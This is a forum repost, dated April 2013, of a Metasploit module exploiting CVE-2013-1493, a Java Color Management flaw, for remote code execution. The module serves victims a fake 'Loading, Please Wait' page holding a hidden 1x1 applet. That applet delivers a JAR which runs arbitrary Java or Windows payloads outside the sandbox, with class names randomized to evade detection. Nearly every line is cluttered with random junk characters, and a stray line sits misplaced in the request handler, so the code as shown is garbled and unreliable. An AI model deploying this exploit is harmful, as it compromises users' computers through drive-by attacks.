##' ?: i+ I& ]( e
% ?8 y" ^+ H4 J! s
# This file is part of the Metasploit Framework and may be subject to
3 c) N7 D) L" _3 h& s# redistribution and commercial restrictions. Please see the Metasploit# Y2 p9 c# H7 d7 E. Y2 t% G
# web site for more information on licensing and terms of use.
) A+ [ y6 a" Z+ q# http://metasploit.com/
) S; t, K1 a- K) k0 X5 C##. }/ [: c& A9 R- \" |
require ‘msf/core’4 A; c$ l6 R7 p% y( Q
require ‘rex’- Q8 A$ F$ w4 O( p
class Metasploit3 < Msf::Exploit::Remote( N6 y/ z3 H* |
Rank = NormalRanking0 I' t& ]- F! ~5 J, K/ R5 \) ]2 a
include Msf::Exploit::Remote::HttpServer::HTML, b( d3 p/ n7 N
include Msf::Exploit::EXE) M4 w- m0 g6 I$ V2 r) e
include Msf::Exploit::Remote::BrowserAutopwn5 B4 O8 \6 q! u7 \. g
autopwn_info({ :javascript => false })' x. L: l E* I, C+ p
def initialize( info = {} )" _# |6 u4 U& G: X3 W# q
super( update_info( info,
0 s' K& v& z3 T: S% t‘Name’ => ‘Java CMM Remote Code Execution’,
2 t+ B. Z! Y* Y‘Description’ => %q{
* j* K9 K- T/ k% l7 |% _This module abuses the Color Management classes from a Java Applet to run
0 t. C1 h, z. a5 ~) x* yarbitrary Java code outside of the sandbox as exploited in the wild in February9 F$ m& S5 Y1 w
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; m% }: u6 M. V; u) X" s" F3 sand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1! I. V4 |- G+ ^0 c) u, I3 U
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
}* |" Q5 P' A& ^$ c$ Mwarning in order to run the malicious applet.- y9 g' w4 t) z, ]- V5 Q- Z
},
2 m, b c) }* H+ a/ H* T‘License’ => MSF_LICENSE,- r( |: H0 _. E3 F; ~
‘Author’ =>
8 s; t3 l# [" q ], c'Unknown', # Vulnerability discovery and Exploit
8 ]% b% h! _# G! T2 f }+ u'juan vazquez' # Metasploit module (just ported the published exploit). N$ o* ?" M4 i k$ C
],
$ x" f4 s. d) ?2 ~! a. O' L‘References’ =>0 F! Z3 c6 i- E8 k$ h
[
4 t% U/ I' W% [! u[ 'CVE', '2013-1493' ],
# w% i+ N% w+ Q& w5 t1 c[ 'OSVDB', '90737' ],
; u" {8 R0 ^+ D$ K" D1 @[ 'BID', '58238' ],
! r% C7 o6 T( F" \0 ]# f[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
4 T" ~6 M( }0 D# g! y[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
) [2 {1 Y4 L4 r[ 'URL', 'http://pastie.org/pastes/6581034' ]
6 C$ { r) N! I],4 Y8 s# g4 B6 j' y3 D# p! Z* [
‘Platform’ => [ 'win', 'java' ],
/ [. A8 B& f, h K: d+ f# R+ m‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
I) N% c0 W" E; @4 S5 T‘Targets’ =>) C" F( N% N$ Y) m9 t
[
1 t: l/ h5 V! x( m* j2 i[ 'Generic (Java Payload)',
! B5 p% |6 L, j& V0 P{
& Y& s$ G r: f1 S8 @3 G'Platform' => 'java',2 g9 `9 `0 \& i# y) i
'Arch' => ARCH_JAVA+ K) F& r* w5 \) E) o* w& ~- S8 ^8 n6 C
}$ I$ `2 [* ?1 @# P8 C5 h
],4 _7 q$ s. V6 o
[ 'Windows x86 (Native Payload)',
Z. {4 S% D0 Y& b$ l2 j1 a{! ?. e/ d, U h1 e6 O
'Platform' => 'win',, p7 e+ J' r5 I* y! Z
'Arch' => ARCH_X86
- n' z3 l/ ^& v}
]5 P1 d" Z/ ?! f0 d0 {" x: }]0 U4 H0 X9 w/ w& Y& b
],
7 |2 G" A7 E) c, n- A‘‘DisclosureDate’ => ‘Mar 01 2013′% n* |+ N/ H) h7 _; \
))- p! @( N4 X/ x3 `: O$ r4 z9 {& z( I
end
, H3 {* Z3 s9 Wdef setup
; d6 E% N, H& `% Upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
]( d/ o6 f, P2 n& Y* v@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) W1 r( ^6 x3 F6 b; |
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)7 \, @: I# a5 W( d, t& J6 ?! z
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
$ t3 s* U* S, {9 upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”), Z& B% A2 T9 h* W( r# c; w# j
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
" k! G, {6 j5 c6 \path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
3 ^+ r* a: j/ ^% J; k1 K@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! e: I( f/ l! z0 t/ |2 V
@init_class_name = rand_text_alpha(“Init”.length)) q" R9 H t! k
@init_class.gsub!(“Init”, @init_class_name)
) S: n" M2 [" E1 N1 jsuper
+ y. l+ Z. F4 h gend
) D; q. z8 f4 G# j9 vdef on_request_uri(cli, request)0 l+ I1 l V1 s& @6 G' z
print_status(“handling request for #{request.uri}”); f+ H% f/ [; G# T# a4 R4 N
case request.uri# k: G+ v( B8 C( _+ ^! A7 H: ?
when /\.jar$/i3 V) b' ~' r; ~5 O; o' m
jar = payload.encoded_jar
8 V& F0 v. N8 \* Ojar.add_file(“#{@init_class_name}.class”, @init_class)/ X: `/ W D- c6 H6 f# g1 M
jar.add_file(“Leak.class”, @leak_class)
/ o: f7 f$ r. p% C3 e) G$ sjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
; d3 x7 [/ j5 a7 ~jar.add_file(“MyColorSpace.class”, @color_space_class)$ ]& [# ^ f2 H: N; s. ?3 R( C
DefaultTarget’ => 1,+ J `/ T& M% R2 ?! _, w
metasploit_str = rand_text_alpha(“metasploit”.length)
, b }8 `: Z# Ypayload_str = rand_text_alpha(“payload”.length)
! ~' i8 w: F. e+ njar.entries.each { |entry|
5 {* ?2 s2 S5 F% R+ Qentry.name.gsub!(“metasploit”, metasploit_str)9 c3 F6 Q8 Y' k% L
entry.name.gsub!(“Payload”, payload_str)
' ?! q3 Y' g: A3 L! y5 Tentry.data = entry.data.gsub(“metasploit”, metasploit_str). O6 V% `6 n* N1 P H2 J y- z; M
entry.data = entry.data.gsub(“Payload”, payload_str)) x! U0 p+ T+ b( e7 V$ o9 k
}
3 u+ h0 C7 Q+ R& xjar.build_manifest
- V1 w$ [, o( F, Q- T/ Q6 n* Y# z& S. Fsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
X; z' w" z" J+ D4 J9 v6 Fwhen /\/$/6 n2 `; c& |3 I' c8 a4 R& j
payload = regenerate_payload(cli)! f$ K% A9 l7 E& I% Q+ O/ s# @
if not payload; f6 a, ]3 V6 d0 b
print_error(“Failed to generate the payload.”). E* ?# A9 T7 y9 R
send_not_found(cli)9 N6 L" S2 E0 u
return
9 u6 h0 q- e% @6 O) Kend! R% e9 V+ V% |5 }+ B
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })+ |( ^( K5 \9 c
else
5 a- E- i8 Z3 G2 x8 Q; hsend_redirect(cli, get_resource() + ‘/’, ”)
_( d# {2 S# D# Vend2 T0 O# @& C% ] s. V
end% b# L" r% N6 ~& [$ ~2 U {; p6 B
def generate_html
0 V" u/ K9 B1 g1 R C- Xhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
" [: x, K4 H! p7 |4 Chtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
9 k4 A7 x1 X( \" w$ ]$ j Whtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|/ t* Y+ |1 K7 ^0 @# A" L
html += %Q|</applet></body></html>|( s& d/ k. a3 y7 `. A7 g
return html1 `7 M/ j+ b2 ?- B' u9 m; |) _ ]
end- Q9 B6 u1 a" ^- @5 R2 m
end
: a4 O6 \% ]& k1 p, h0 Yend7 S7 R4 B7 ^6 b4 m U* T- e1 B
|
发表于 2013-4-4 17:31:17
收藏
支持
反对